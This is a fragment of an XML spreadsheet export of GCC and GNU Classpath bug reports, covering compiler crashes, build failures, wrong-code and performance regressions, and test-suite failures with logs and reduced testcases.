    <t>[5 Regression] ICE: simplify_immed_subreg at simplify-rtx.c:5519 with -mstringop-strategy=vector_loop -mavx512f</t>
  </si>
  <si>
    <t>Created attachment 33999
reduced testcase
Compiler output:
$ gcc -O -mstringop-strategy=vector_loop -mavx512f testcase.c 
testcase.c: In function 'foo':
testcase.c:8:1: internal compiler error: in simplify_immed_subreg at simplify-rtx.c:5519
 }
 ^
0xc331ee simplify_immed_subreg
        /mnt/svn/gcc-trunk/gcc/simplify-rtx.c:5519
0xc48509 simplify_gen_subreg(machine_mode rtx_def* machine_mode unsigned int)
        /mnt/svn/gcc-trunk/gcc/simplify-rtx.c:5818
0x165f75c propagate_rtx_1
        /mnt/svn/gcc-trunk/gcc/fwprop.c:550
0x166014f propagate_rtx
        /mnt/svn/gcc-trunk/gcc/fwprop.c:686
0x1661f63 forward_propagate_and_simplify
        /mnt/svn/gcc-trunk/gcc/fwprop.c:1333
0x1661f63 forward_propagate_into
        /mnt/svn/gcc-trunk/gcc/fwprop.c:1391
0x1662c84 fwprop
        /mnt/svn/gcc-trunk/gcc/fwprop.c:1476
0x1662c84 execute
        /mnt/svn/gcc-trunk/gcc/fwprop.c:1509
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
Tested revisions:
r217624 - ICE
4_9 r216937 - OK</t>
  </si>
  <si>
    <t>GCC-42243</t>
  </si>
  <si>
    <t>[4.5 Regression] powerpc-apple-darwin9 libffi failures</t>
  </si>
  <si>
    <t>Bootstrap on powerpc-apple-darwin9 at revision 154872 is broken:
...
libtool: compile:  /opt/gcc/darwin_buildw/./gcc/xgcc -B/opt/gcc/darwin_buildw/./gcc/ -B/opt/gcc/gcc4.5w/powerpc-apple-darwin9/bin/ -B/opt/gcc/gcc4.5w/powerpc-apple-darwin9/lib/ -isystem /opt/gcc/gcc4.5w/powerpc-apple-darwin9/include -isystem /opt/gcc/gcc4.5w/powerpc-apple-darwin9/sys-include -m64 -DHAVE_CONFIG_H -I. -I../../../../gcc-4.5-work/libffi -I. -I../../../../gcc-4.5-work/libffi/include -Iinclude -I../../../../gcc-4.5-work/libffi/src -Wall -g -fexceptions -g -O2 -m64 -MT src/powerpc/ffi_darwin.lo -MD -MP -MF src/powerpc/.deps/ffi_darwin.Tpo -c ../../../../gcc-4.5-work/libffi/src/powerpc/ffi_darwin.c  -fno-common -DPIC -o src/powerpc/.libs/ffi_darwin.o
../../../../gcc-4.5-work/libffi/src/powerpc/ffi_darwin.c: In function 'ffi_prep_args':
../../../../gcc-4.5-work/libffi/src/powerpc/ffi_darwin.c:160:6: error: lvalue required as increment operand
../../../../gcc-4.5-work/libffi/src/powerpc/ffi_darwin.c: In function 'ffi_call':
../../../../gcc-4.5-work/libffi/src/powerpc/ffi_darwin.c:499:6: warning: passing argument 6 of 'ffi_call_AIX' from incompatible pointer type
../../../../gcc-4.5-work/libffi/src/powerpc/ffi_darwin.c:472:13: note: expected 'void (*)(void)' but argument is of type 'void (*)(struct extended_cif * long unsigned int * const)'
../../../../gcc-4.5-work/libffi/src/powerpc/ffi_darwin.c:503:9: warning: passing argument 6 of 'ffi_call_DARWIN' from incompatible pointer type
../../../../gcc-4.5-work/libffi/src/powerpc/ffi_darwin.c:474:13: note: expected 'void (*)(void)' but argument is of type 'void (*)(struct extended_cif * long unsigned int * const)'
...
Likely due to revision 154855:
Subject: Bug 35484
Author: dje
Date: Mon Nov 30 23:34:33 2009
New Revision: 154855
URL: http://gcc.gnu.org/viewcvs?root=gcc&amp;view=rev&amp;rev=154855
Log:
2009-11-30  David Edelsohn  
        PR target/35484
        * src/powerpc/ffitarget.h (POWERPC64): Define for PPC64 Linux and
        AIX64.
        * src/powerpc/aix.S: Implement AIX64 version.
        * src/powerpc/aix_closure.S: Implement AIX64 version.
        (ffi_closure_ASM): Use extsb lha and displament addresses.
        * src/powerpc/ffi_darwin.c (ffi_prep_args): Implement AIX64
        support.
        (ffi_prep_cif_machdep): Same.
        (ffi_call): Same.
        (ffi_closure_helper_DARWIN): Same.
Modified:
    trunk/libffi/ChangeLog
    trunk/libffi/src/powerpc/aix.S
    trunk/libffi/src/powerpc/aix_closure.S
    trunk/libffi/src/powerpc/ffi_darwin.c
    trunk/libffi/src/powerpc/ffitarget.h
See also http://gcc.gnu.org/ml/gcc-regression/2009-12/msg00004.html .</t>
  </si>
  <si>
    <t>GCC-55450</t>
  </si>
  <si>
    <t>libtool: install: error: cannot install `libtsan.la' to a directory not ending in /usr/lib/gcc/x86_64-pc-linux-gnu/</t>
  </si>
  <si>
    <t>This issue was fixed by H.J. a few days ago but it reappeared today:
 make[4]: Entering directory `/var/tmp/gcc_build_dir/x86_64-pc-linux-gnu/libsanitizer/tsan'
test -z /usr/lib/gcc/x86_64-pc-linux-gnu/ || /bin/mkdir -p /usr/lib/gcc/x86_64-pc-linux-gnu/
 /bin/sh ../libtool   --mode=install /usr/bin/install -c   libtsan.la '/usr/lib/gcc/x86_64-pc-linux-gnu/'
libtool: install: error: cannot install `libtsan.la' to a directory not ending in /usr/lib/gcc/x86_64-pc-linux-gnu/
make[4]: *** [install-toolexeclibLTLIBRARIES] Error 1
Configured with:
~/gcc/configure --prefix=/usr --bindir=/usr/x86_64-pc-linux-gnu/gcc-bin/4.8.0 --includedir=/usr/lib/gcc/x86_64-pc-linux-gnu/4.8.0/include --datadir=/usr/share/gcc-data/x86_64-pc-linux-gnu/4.8.0 --mandir=/usr/share/gcc-data/x86_64-pc-linux-gnu/4.8.0/man --infodir=/usr/share/gcc-data/x86_64-pc-linux-gnu/4.8.0/info --with-gxx-include-dir=/usr/lib/gcc/x86_64-pc-linux-gnu/4.8.0/include/g++-v4 --host=x86_64-pc-linux-gnu --build=x86_64-pc-linux-gnu --disable-altivec --disable-fixed-point --without-ppl --without-cloog --enable-lto --enable-nls --without-included-gettext --with-system-zlib --disable-werror --enable-initfini-array --with-gold --enable-secureplt --disable-multilib --enable-libmudflap --disable-libssp --disable-libgomp --enable-cld --with-python-dir=/share/gcc-data/x86_64-pc-linux-gnu/4.8.0/python --enable-checking=release --disable-libgcj --enable-languages=cc++ --enable-shared --enable-threads=posix --enable-__cxa_atexit --enable-clocale=gnu --with-build-config=slim-lto-bootstrap --with-boot-ldflags=-Wl-O1--hash-style=gnu--as-needed--gc-sections--icf=safe--icf-iterations=3 --enable-version-specific-runtime-libs --disable-libstdcxx-pch --enable-libstdcxx-time=yes</t>
  </si>
  <si>
    <t>GCC-79389</t>
  </si>
  <si>
    <t>[7 Regression] 30% performance regression in SciMark2 MonteCarlo</t>
  </si>
  <si>
    <t>Created attachment 40676
The relevant source code and generated assembler before/after this change
The MonteCarlo test from the old SciMark2 (http://math.nist.gov/scimark) used in the Phoronix compiler test suite has regressed 30% compared to GCC 6.3 when run on Intel i7 6800K Broadwell (compiled with -O3 -march=native).
The regression was introduced in r238005:
------------------------------------------------------------------------
r238005 | rguenth | 2016-07-05 15:25:47 +0200 (tis 05 jul 2016) | 7 lines
2016-07-05  Richard Biener  
        * gimple-ssa-split-paths.c (find_block_to_duplicate_for_splitting_pa):
	Handle empty else block.
	(is_feasible_trace): Likewise.
	(split_paths): Likewise.
------------------------------------------------------------------------
and has the effect that the if-statement in the loop
    for (count=0 count&lt;Num_samples count++)
    {
      double x= Random_nextDouble(R)
      double y= Random_nextDouble(R)
      if ( x*x + y*y &lt;= 1.0)
        under_curve ++
    }
is changed from a cmov to a branch which mispredicts.</t>
  </si>
  <si>
    <t>krister.walfridsson</t>
  </si>
  <si>
    <t>GCC-53312</t>
  </si>
  <si>
    <t>crash in materialize_cgraph (invalid free)</t>
  </si>
  <si>
    <t>Crash encountered when compiling the last svn version of
Valgrind with LTO.
I tried to isolate the problem but failed.
   philippe@gcc20:~/valgrind/valgrind_lto/memcheck$ which gcc
   /home/philippe/gcc/gcc-4.7.0-inst/bin/gcc
   philippe@gcc20:~/valgrind/valgrind_lto/memcheck$ gcc -v
   Using built-in specs.
   COLLECT_GCC=gcc
   COLLECT_LTO_WRAPPER=/home/philippe/gcc/gcc-4.7.0-inst/libexec/gcc/x86_64-unknown-linux-gnu/4.7.0/lto-wrapper
   Target: x86_64-unknown-linux-gnu
   Configured with: ../gcc-4.7.0/configure --disable-nls --enable-__cxa_atexit --enable-threads=posix --enable-languages=cc++ --prefix=/home/philippe/gcc/gcc-4.7.0-inst --with-plugin-ld=/usr/bin/gold
   Thread model: posix
   gcc version 4.7.0 (GCC) 
Here are the details about how to reproduce and details
about the crash.
How to reproduce:
-------------------
svn co svn://svn.valgrind.org/valgrind/trunk valgrind_lto
cd valgrind_lto
export LD=/usr/bin/gold
export PATH=/home/philippe/gcc/gcc-4.7.0-inst/bin:$PATH
./autogen.sh 
export CFLAGS=-flto -fuse-linker-plugin
CFLAGS=-flto -fuse-linker-plugin ./configure --prefix=`pwd`/install
nice make -j20 2&gt;&amp;1 | tee m.out
=&gt; crash of lto1.
The symptoms can vary : either a segmentation fault
or a fatal error message from the glibc malloc library (so this 
looks like a heap corruption or dangling pointer) :
   ../coregrind/link_tool_exe_linux 0x38000000 gcc  -Wno-long-long -flto -fuse-linker-plugin -Wno-pointer-sign -fno-stack-protector   -o memcheck-amd64-linux -m64 -fomit-frame-pointer -O2 -g -Wall -Wmissing-prototypes -Wshadow -Wpointer-arith -Wstrict-prototypes -Wmissing-declarations -Wno-format-zero-length -fno-strict-aliasing -fno-builtin -O2 -static -nodefaultlibs -nostartfiles -u _start -Wl--build-id=none -m64 memcheck_amd64_linux-mc_leakcheck.o memcheck_amd64_linux-mc_malloc_wrappers.o memcheck_amd64_linux-mc_main.o memcheck_amd64_linux-mc_translate.o memcheck_amd64_linux-mc_machine.o memcheck_amd64_linux-mc_errors.o ../coregrind/libcoregrind-amd64-linux.a ../VEX/libvex-amd64-linux.a -lgcc 
   *** glibc detected *** /home/philippe/gcc/gcc-4.7.0-inst/libexec/gcc/x86_64-unknown-linux-gnu/4.7.0/lto1: munmap_chunk(): invalid pointer: 0x00002aaaabdb55e4 ***
   ======= Backtrace: =========
   /lib/libc.so.6(+0x71bd6)[0x2aaaab88bbd6]
   /home/philippe/gcc/gcc-4.7.0-inst/libexec/gcc/x86_64-unknown-linux-gnu/4.7.0/lto1[0x4cf6de]
   /home/philippe/gcc/gcc-4.7.0-inst/libexec/gcc/x86_64-unknown-linux-gnu/4.7.0/lto1(_Z8lto_mainv+0x6e0)[0x4d1160]
   /home/philippe/gcc/gcc-4.7.0-inst/libexec/gcc/x86_64-unknown-linux-gnu/4.7.0/lto1(_Z11toplev_mainiPPc+0xa50)[0x72f3c0]
   /lib/libc.so.6(__libc_start_main+0xfd)[0x2aaaab838c8d]
   /home/philippe/gcc/gcc-4.7.0-inst/libexec/gcc/x86_64-unknown-linux-gnu/4.7.0/lto1[0x4b3ff1]
   ======= Memory map: ========
   ...
To re-run the link command under Valgrind I am doing the following:
-------------------------------------------------------------------
cd memcheck
~philippe/valgrind/trunk_untouched/install/bin/valgrind --trace-children=yes \
../coregrind/link_tool_exe_linux 0x38000000 gcc  -Wno-long-long -flto -fuse-linker-plugin -Wno-pointer-sign -fno-stack-protector   -o memcheck-amd64-linux -m64 -fomit-frame-pointer -O2 -g -Wall -Wmissing-prototypes -Wshadow -Wpointer-arith -Wstrict-prototypes -Wmissing-declarations -Wno-format-zero-length -fno-strict-aliasing -fno-builtin -O2 -static -nodefaultlibs -nostartfiles -u _start -Wl--build-id=none -m64 memcheck_amd64_linux-mc_leakcheck.o memcheck_amd64_linux-mc_malloc_wrappers.o memcheck_amd64_linux-mc_main.o memcheck_amd64_linux-mc_translate.o memcheck_amd64_linux-mc_machine.o memcheck_amd64_linux-mc_errors.o ../coregrind/libcoregrind-amd64-linux.a ../VEX/libvex-amd64-linux.a -lgcc 
... after quite some time (several processes have to run under Valgrind):
   ==7640== Command: /home/philippe/gcc/gcc-4.7.0-inst/libexec/gcc/x86_64-unknown-linux-gnu/4.7.0/lto1 -quiet -dumpdir ./ -dumpbase memcheck-amd64-linux.ltrans11 -mtune=generic -march=x86-64 -m64 -mtune=generic -march=x86-64 -auxbase-strip /tmp/ccb7Bhpg.ltrans11.ltrans.o -g -O2 -O2 -Wshadow -fuse-linker-plugin -fno-stack-protector -fomit-frame-pointer -fno-strict-aliasing -fltrans @/tmp/cc3ZsEPX -o /tmp/ccmdOT7S.s
   ==7640== 
   ==7640== Invalid free() / delete / delete[] / realloc()
   ==7640==    at 0x4C2475F: free (vg_replace_malloc.c:427)
   ==7640==    by 0x4CF6DD: materialize_cgraph() (lto.c:248)
   ==7640==    by 0x4D115F: lto_main() (lto.c:2936)
   ==7640==    by 0x72F3BF: toplev_main(int char**) (toplev.c:557)
   ==7640==    by 0x5996C8C: (below main) (libc-start.c:228)
   ==7640==  Address 0x406c880 is not stack'd malloc'd or (recently) free'd
   ==7640== 
   In function 'check_auxmap_L1_L2_sanity':
   lto1: internal compiler error: compressed stream: data error
   Please submit a full bug report
   with preprocessed source if appropriate.
   See  for instructions.
   ==7640== 
Note that to debug the process at the moment of the crash you might
give option --vgdb-error=1  to Valgrind.
You can then use gdb to connect to the embedded Valgrind gdbserver at the moment
of the invalid free error.
I tried to isolate the problem to have a smaller reproducer but 
the problem quickly disappears when trying that.
Is the above information enough to look at the problem ?
Otherwise is there some tools or hints helping to isolate such errors ?
Thanks
Philippe</t>
  </si>
  <si>
    <t>philippe.waroquiers</t>
  </si>
  <si>
    <t>CLASSPATH-28661</t>
  </si>
  <si>
    <t>HTTP Header differs b/w java and classpath</t>
  </si>
  <si>
    <t>Using a HttpURLConnection object the created HTTP 
Header for an POST request differs. Java provides the 
content type application/x-www-form-urlencoded by 
default Classpath does not which causes a java library I 
am using to fail sending the request:
result for java:
 POST / HTTP/1.1
 Cache-Control: no-cache
 Pragma: no-cache
 User-Agent: Java/1.5.0_06
 Host: localhost:1234
 Accept: text/html image/gif image/jpeg * q=.2 */* q=.2
 Connection: keep-alive
 Content-type: application/x-www-form-urlencoded
 Content-Length: 9
 some=data
result for classpath:
 POST / HTTP/1.1
 Host: localhost:1234
 User-Agent: gnu-classpath/0.91 (IKVM.NET/0.28.0.0)
 Connection: keep-alive
 Accept-Encoding: chunkedq=1.0 gzipq=0.9 deflateq=0.8 identityq=0.6 *q=0
 Content-Length: 9
 some=data
Manually modifying the library to explicitly set this 
content type works though similar behaviour would be 
desireable.
Enrico Minack</t>
  </si>
  <si>
    <t>daney</t>
  </si>
  <si>
    <t>minack</t>
  </si>
  <si>
    <t>GCC-64483</t>
  </si>
  <si>
    <t>FAIL: 18_support/exception_ptr/64241.cc (test for excess errors)</t>
  </si>
  <si>
    <t>spawn /test/gnu/gcc/objdir/./gcc/xg++ -shared-libgcc -B/test/gnu/gcc/objdir/./gc
c -nostdinc++ -L/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/libstdc++-v3/src -L/tes
t/gnu/gcc/objdir/hppa64-hp-hpux11.11/libstdc++-v3/src/.libs -L/test/gnu/gcc/objd
ir/hppa64-hp-hpux11.11/libstdc++-v3/libsupc++/.libs -B/opt/gnu64/gcc/gcc-5.0/hpp
a64-hp-hpux11.11/bin/ -B/opt/gnu64/gcc/gcc-5.0/hppa64-hp-hpux11.11/lib/ -isystem /opt/gnu64/gcc/gcc-5.0/hppa64-hp-hpux11.11/include -isystem /opt/gnu64/gcc/gcc-
5.0/hppa64-hp-hpux11.11/sys-include -B/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/./libstdc++-v3/src/.libs -D_GLIBCXX_ASSERT -fmessage-length=0 -ffunction-sections
 -fdata-sections -g -O2 -DLOCALEDIR=. -nostdinc++ -I/test/gnu/gcc/objdir/hppa6
4-hp-hpux11.11/libstdc++-v3/include/hppa64-hp-hpux11.11 -I/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/libstdc++-v3/include -I/test/gnu/gcc/gcc/libstdc++-v3/libsupc
++ -I/test/gnu/gcc/gcc/libstdc++-v3/include/backward -I/test/gnu/gcc/gcc/libstdc++-v3/testsuite/util /test/gnu/gcc/gcc/libstdc++-v3/testsuite/18_support/exception_ptr/64241.cc -std=gnu++11 -fno-exceptions -O0 ./libtestc++.a -lm -o ./64241.exe/test/gnu/gcc/gcc/libstdc++-v3/testsuite/18_support/exception_ptr/64241.cc: In function 'void test01()':/test/gnu/gcc/gcc/libstdc++-v3/testsuite/18_support/exception_ptr/64241.cc:31:3: error: 'exception_ptr' is not a member of 'std'
   std::exception_ptr p = std::make_exception_ptr(1)
   ^
In file included from /test/gnu/gcc/objdir/hppa64-hp-hpux11.11/libstdc++-v3/include/cassert:43:0
                 from /test/gnu/gcc/gcc/libstdc++-v3/testsuite/util/testsuite_hooks.h:58
                 from /test/gnu/gcc/gcc/libstdc++-v3/testsuite/18_support/exception_ptr/64241.cc:21:
/test/gnu/gcc/gcc/libstdc++-v3/testsuite/18_support/exception_ptr/64241.cc:32:11: error: 'p' was not declared in this scope
   VERIFY( p == nullptr )
           ^
/test/gnu/gcc/gcc/libstdc++-v3/testsuite/18_support/exception_ptr/64241.cc:32:3: note: in expansion of macro 'VERIFY'
   VERIFY( p == nullptr )
   ^
compiler exited with status 1
...
FAIL: 18_support/exception_ptr/64241.cc (test for excess errors)
Excess errors:
/test/gnu/gcc/gcc/libstdc++-v3/testsuite/18_support/exception_ptr/64241.cc:31:3: error: 'exception_ptr' is not a member of 'std'
/test/gnu/gcc/gcc/libstdc++-v3/testsuite/18_support/exception_ptr/64241.cc:32:11: error: 'p' was not declared in this scope
UNRESOLVED: 18_support/exception_ptr/64241.cc compilation failed to produce executable</t>
  </si>
  <si>
    <t>GCC-78300</t>
  </si>
  <si>
    <t>[OOP] Failure to compile a F03 code with an optional dummy procedure argument</t>
  </si>
  <si>
    <t>Source code: https://gitlab.com/DmitryLyakh/GFC.git
The minimal reproducer can be created by taking only three source files from GFC:
gfortran -c dil_basic.F90
gfortran -c timers.F90
gfortran -c -DNO_GNU gfc_base.F90 (GFORTRAN fails to compile if you define -DNO_GNU)
If you look inside gfc_base.F90 line 240 (subroutine ContElemConstruct) you will see the exact place where the compile error occurs. For some reason it has problems with an optional dummy procedure argument. I believe this is a compiler bug. All other compilers I tried compile and run the code fine (Cray PGI XL probably Intel as well).
Please help fixing this problem in gfortran. Thanks!</t>
  </si>
  <si>
    <t>liakhdi</t>
  </si>
  <si>
    <t>GCC-33288</t>
  </si>
  <si>
    <t>ICE (segfault) in mpfr_cmp2 when evaluating array initializers containing addition</t>
  </si>
  <si>
    <t>gfortran 4.1.2/4.2.0/4.3.0 segfaults when compiling the following program:
program initbug
     integerparameter :: n0 = 3 n = 5
     real(kind=8)parameter :: x0(n0) = (/ 0.0d0 0.0d0 0.0d0 /)
     real(kind=8)parameter :: x(n) = (/ -x0 x0(n0-1:1:-1) /) + 1.0d0
end program initbug
Valgrind output:
$ valgrind /home/r6144/apps/gcc-4.3.0-070903-bin/bin/../libexec/gcc/i386-pc-linux-gnu/4.3.0/f951 initbug.f90 -quiet -dumpbase initbug.f90 -march=pentium4 -mfpmath=sse -auxbase-strip initbug.o -g -O2 -Wall -W -Wno-unused -Wimplicit-interface -Wtabs -version -ffree-form -ffree-line-length-none -fimplicit-none -ffpe-trap=invalidzerooverflow -fintrinsic-modules-path /home/r6144/apps/gcc-4.3.0-070903-bin/bin/../lib/gcc/i386-pc-linux-gnu/4.3.0/finclude -o /tmp/ccZfWmpd.s
==5331== Memcheck a memory error detector.
==5331== Copyright (C) 2002-2006 and GNU GPL'd by Julian Seward et al.
==5331== Using LibVEX rev 1658 a library for dynamic binary translation.
==5331== Copyright (C) 2004-2006 and GNU GPL'd by OpenWorks LLP.
==5331== Using valgrind-3.2.1 a dynamic binary instrumentation framework.
==5331== Copyright (C) 2000-2006 and GNU GPL'd by Julian Seward et al.
==5331== For more details rerun with: -v
==5331==
GNU F95 (GCC) version 4.3.0 20070902 (experimental) [trunk revision 128023] (i386-pc-linux-gnu)
        compiled by GNU C version 4.3.0 20070902 (experimental) [trunk revision 128023] GMP version 4.2.1 MPFR version 2.2.1.
GGC heuristics: --param ggc-min-expand=63 --param ggc-min-heapsize=63256
==5331== Invalid read of size 4
==5331==    at 0x84CCEDB: mpfr_cmp2 (in /home/r6144/apps/gcc-4.3.0-070903-bin/libexec/gcc/i386-pc-linux-gnu/4.3.0/f951)
==5331==    by 0x84C6D35: mpfr_sub1 (in /home/r6144/apps/gcc-4.3.0-070903-bin/libexec/gcc/i386-pc-linux-gnu/4.3.0/f951)
==5331==    by 0x84B9AB2: mpfr_add (in /home/r6144/apps/gcc-4.3.0-070903-bin/libexec/gcc/i386-pc-linux-gnu/4.3.0/f951)
==5331==    by 0x804CB56: gfc_arith_plus (arith.c:657)
==5331==  Address 0x812488 is not stack'd malloc'd or (recently) free'd
initbug.f90:0: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>rainy6144</t>
  </si>
  <si>
    <t>GCC-26552</t>
  </si>
  <si>
    <t>gcc.dg/sibcall-6.c fails on x86-darwin with default options</t>
  </si>
  <si>
    <t>gcc.dg/sibcall-6.c fails on x86-darwin since PIC is enabled by default but on darwin PIC is handled differently so it should be able to sibcall to the indirect function.</t>
  </si>
  <si>
    <t>GCC-71805</t>
  </si>
  <si>
    <t>incorrect code for test pr45752.c with -mcpu=power9</t>
  </si>
  <si>
    <t>Created attachment 38859
objdump of generated binary plus my annotations which are abstracted in the note above
testsuite/gcc.dg/vect/pr45752.c is producing some code where it seems like a register value needed is being overwritten
Compile flags:
/home/sawdey/src/gcc/gcc-6-branch/build/gcc/xgcc -B/home/sawdey/src/gcc/gcc-6-branch/build/gcc/ /home/sawdey/src/gcc/gcc-6-branch/gcc/gcc/testsuite/gcc.dg/vect/pr45752.c  -mcpu=power9 -Wl-rpath=/tmp/lib64  -fno-diagnostics-show-caret -fdiagnostics-color=never  -flto -ffat-lto-objects -maltivec -mpower9-vector -ftree-vectorize -fno-vect-cost-model -fno-common -O2 -fdump-tree-vect-details --param tree-reassoc-width=1  -lm  -o ./pr45752.exe
The compiler is gcc-6-branch 238072 plus bergner's p9 VMX ICE patch and kelvin's vpermr fix.
The 4th group of 4 results is incorrect:
(gdb) p check_results
$24 = {3208 1334 28764 35679 2789 13028 4754 168364 91254 12399 22848 8174 307964 146829 22009 32668 11594 447564 202404 31619}
(gdb) p output
$25 = {3208 1334 28764 35679 2789 13028 4754 168364 91254 12399 22848 8174 310424 178137 26529 31036 11594 447564 202404 31619}
This is my extraction of the dataflow for the incorrect vector:
    10000788:   09 00 e9 f5     lxv     vs470(r9)                                      &lt;&lt; set vs47/v15 from load
    100007b8:   09 00 87 f6     lxv     vs520(r7)                                      &lt;&lt; set vs52/v20 from load
    10000898:   09 01 81 f4     lxv     vs36256(r1)                            &lt;&lt; set vs36/v4 from load
    100008f8:   99 01 61 f7     lxv     vs59400(r1)                                    &lt;&lt; set vs59 from load
    10000900:   89 01 01 f4     lxv     vs32384(r1)                                    &lt;&lt; set vs32 from load
    10000918:   01 00 e7 f7     lxv     vs310(r7)                                      &lt;&lt; set vs31 from load
    1000094c:   01 00 49 f4     lxv     vs20(r9)                               &lt;&lt; set vs2 from load
    10000950:   01 00 a7 f5     lxv     vs130(r7)                              &lt;&lt; set vs13 from load
    10000958:   eb 03 fb 11     vperm   v15v27v0v15                          &lt;&lt; set v15/vs47 from v27 v0 v15
    10000988:   8c 22 81 11     vspltw  v12v41                                        &lt;&lt; set v12/vs44 from v4/vs36
    10000994:   01 00 29 f4     lxv     vs10(r9)                                       &lt;&lt; set vs1 from load
    100009a0:   96 64 ac f2     xxlor   vs21vs44vs44                          &lt;&lt; set vs21 from vs44/v12
    100009a4:   8c 22 83 11     vspltw  v12v43                                &lt;&lt; set v12/vs44 from v4/vs36
    100009c0:   96 64 8c f0     xxlor   vs4vs44vs44                           &lt;&lt; set vs4 from vs44/v12
    100009cc:   91 ac b5 f1     xxlor   vs45vs21vs21                          &lt;&lt; set vs45/v13 from vs21
    100009d0:   91 fc df f1     xxlor   vs46vs31vs31                          &lt;&lt; set vs46/v14 from vs31
    100009f0:   96 7c af f0     xxlor   vs5vs47vs47                                   &lt;&lt; set vs5 from vs47/v15
    100009fc:   89 70 ed 10     vmuluwm v7v13v14                                      &lt;&lt; set v7/vs39 from v13 v14
    10000a08:   91 14 a2 f1     xxlor   vs45vs2vs2                            &lt;&lt; set vs45/v13 from vs2
    10000a28:   91 24 84 f1     xxlor   vs44vs4vs4                            &lt;&lt; set v12/vs44 from vs4
    10000a2c:   89 68 8c 11     vmuluwm v12v12v13                             &lt;&lt; set v12/vs44 from v12 v13
    10000a3c:   96 64 8c f0     xxlor   vs4vs44vs44                           &lt;&lt; set vs4 from vs44/v12
    10000a40:   f9 00 81 f5     lxv     vs44240(r1)                            &lt;&lt; set vs44/v12 from load
    10000a44:   8c 62 c0 11     vspltw  v14v120                               &lt;&lt; set v14/vs46 from v12/vs44
    10000aa0:   d4 68 5a f1     xxperm  vs10vs58vs13                                  &lt;&lt; set vs10 from vs58 vs13
    10000aa4:   8c 22 40 13     vspltw  v26v40                                        &lt;&lt; set v26/vs58 from v4/vs36
    10000acc:   01 00 c7 f7     lxv     vs300(r7)                                      &lt;&lt; set vs30 from load
    10000b08:   91 0c 81 f1     xxlor   vs44vs1vs1                                    &lt;&lt; set vs44/v12 from vs1
    10000b0c:   89 60 ce 11     vmuluwm v14v14v12                                     &lt;&lt; set v14/vs46 from v14 v12
    10000b20:   8c 22 a2 11     vspltw  v13v42                                        &lt;&lt; set v13/vs45 from v4/vs36
    10000b24:   96 6c 8d f3     xxlor   vs28vs45vs45                                  &lt;&lt; set vs28 from vs45/v13
    10000b40:   91 2c 85 f1     xxlor   vs44vs5vs5                                    &lt;&lt; set vs44/v12 from vs5
    10000b44:   89 a0 8c 12     vmuluwm v20v12v20                                     &lt;&lt; set v20/vs52 from v12 and v20
    10000b5c:   01 00 a9 f5     lxv     vs130(r9)                                      &lt;&lt; set vs13 from load
    10000b94:	89 68 ac 11 	vmuluwm v13v12v13					&lt;&lt; v13/vs45 set here to be written over?
    10000b98:   91 e4 9c f1     xxlor   vs44vs28vs28                                  &lt;&lt; set vs44/v12 from vs28
    10000ba0:   91 fc bf f1     xxlor   vs45vs31vs31                                  &lt;&lt; set vs45/v13 from vs31
    10000ba4:   89 68 8c 12     vmuluwm v20v12v13                                     &lt;&lt; set v20 from v12 and v13
    10000bcc:   91 24 24 f3     xxlor   vs57vs4vs4                                    &lt;&lt; set vs57/v25 from vs4
    10000be0:   80 c8 e7 10     vadduwm v7v7v25                                       &lt;&lt; set v7 from v7 and v25
    10000c00:   80 70 e7 10     vadduwm v7v7v14                                       &lt;&lt; set v7 from v7 and v14
    10000c10:   91 6c ed f3     xxlor   vs63vs13vs13                                  &lt;&lt; set vs63 from vs13
    10000c28:   89 f8 5a 13     vmuluwm v26v26v31                                &lt;&lt; set v26 from v26 and v31
    10000c44:   80 a0 07 11     vadduwm v8v7v20                                    &lt;&lt; set v8/vs40 from v7 and v28
    10000c68:   80 d0 08 11     vadduwm v8v8v26                                &lt;&lt; set v8/vs40 from v8 and v26
The punchline is at 10000b94/10000ba0 which both set v13/vs45 and I don't think that is what was intended.</t>
  </si>
  <si>
    <t>GCC-30364</t>
  </si>
  <si>
    <t>[4.1 Regression] Wrong variable ranges due to constant folding</t>
  </si>
  <si>
    <t>Testcase: (compiled with -O2 at least)
int f(int a int b)
{
  if (a &gt; 0x7FFFFFF0) return 0
  if (b &gt; 0x7FFFFFF0) return 0
  int c = (a - 20) + (b - 20)
  return c &gt; 0x7FFFFFF0
}
GCC 4.1.2 and 4.3.0 (snapshot from 2006-12-17) optimizes the whole function to a single return 0. This would be correct if the function was actually written with c = a + b - 40 under a non-overflow assumption. GCC could indeed deduce that c is no bigger than 0x7FFFFFFF - 40.
But as the function was originally written this property does not hold any longer. For example a = 0x7FFFFFF0 and b = 41 will not cause any overflow during computations and the last conditional shall hence evaluate to true.
The problem is that GCC performs VRP with C language semantic (undefined behavior on overflow) on code that is no longer the input as written by the user so this semantic is not valid at that point. The user input should not have undergone a transformation based on associativity.
Tested with Debian packages. GCC 3.3.6 3.4.6 and 4.0.4 generate correct code. GCC 4.1.2 and 4.3.0 generates wrong code. As the expression a + b - 40 is generated early I suppose any GCC with VRP would produce wrong code for this testcase.</t>
  </si>
  <si>
    <t>CLASSPATH-23255</t>
  </si>
  <si>
    <t>Current BasicTreeUI assumes root is a TreeNode</t>
  </si>
  <si>
    <t>Hi
the current BasicTreeUI implementation makes the assumption
at several places that root is a TreeNode type.
However this is not true as TreeModel.getRoot() can return
any type and this is true for applications which
implement their own TreeModel for example Jump (GIS-App).
The attached demo application is a derived demonstration
example of the problem from the Jump application.
It works with Sun JDK and throws ClassCastExceptions
with GNU classpath.
Wolfgang
classpath cvs 05/08/2005 with jamvm</t>
  </si>
  <si>
    <t>GCC-34497</t>
  </si>
  <si>
    <t>failures on i686-apple-darwin9 in sse4 testcases</t>
  </si>
  <si>
    <t>On i686-apple-darwin9 we are seeing failures in the following sse4 related test cases...
FAIL: gcc.target/i386/sse4_1-blendvpd.c (test for excess errors)
WARNING: gcc.target/i386/sse4_1-blendvpd.c compilation failed to produce executable
FAIL: gcc.target/i386/sse4_1-blendvps.c (test for excess errors)
WARNING: gcc.target/i386/sse4_1-blendvps.c compilation failed to produce executable
FAIL: gcc.target/i386/sse4_1-insertps-1.c (test for excess errors)
WARNING: gcc.target/i386/sse4_1-insertps-1.c compilation failed to produce executable
FAIL: gcc.target/i386/sse4_1-insertps-2.c (test for excess errors)
WARNING: gcc.target/i386/sse4_1-insertps-2.c compilation failed to produce executable
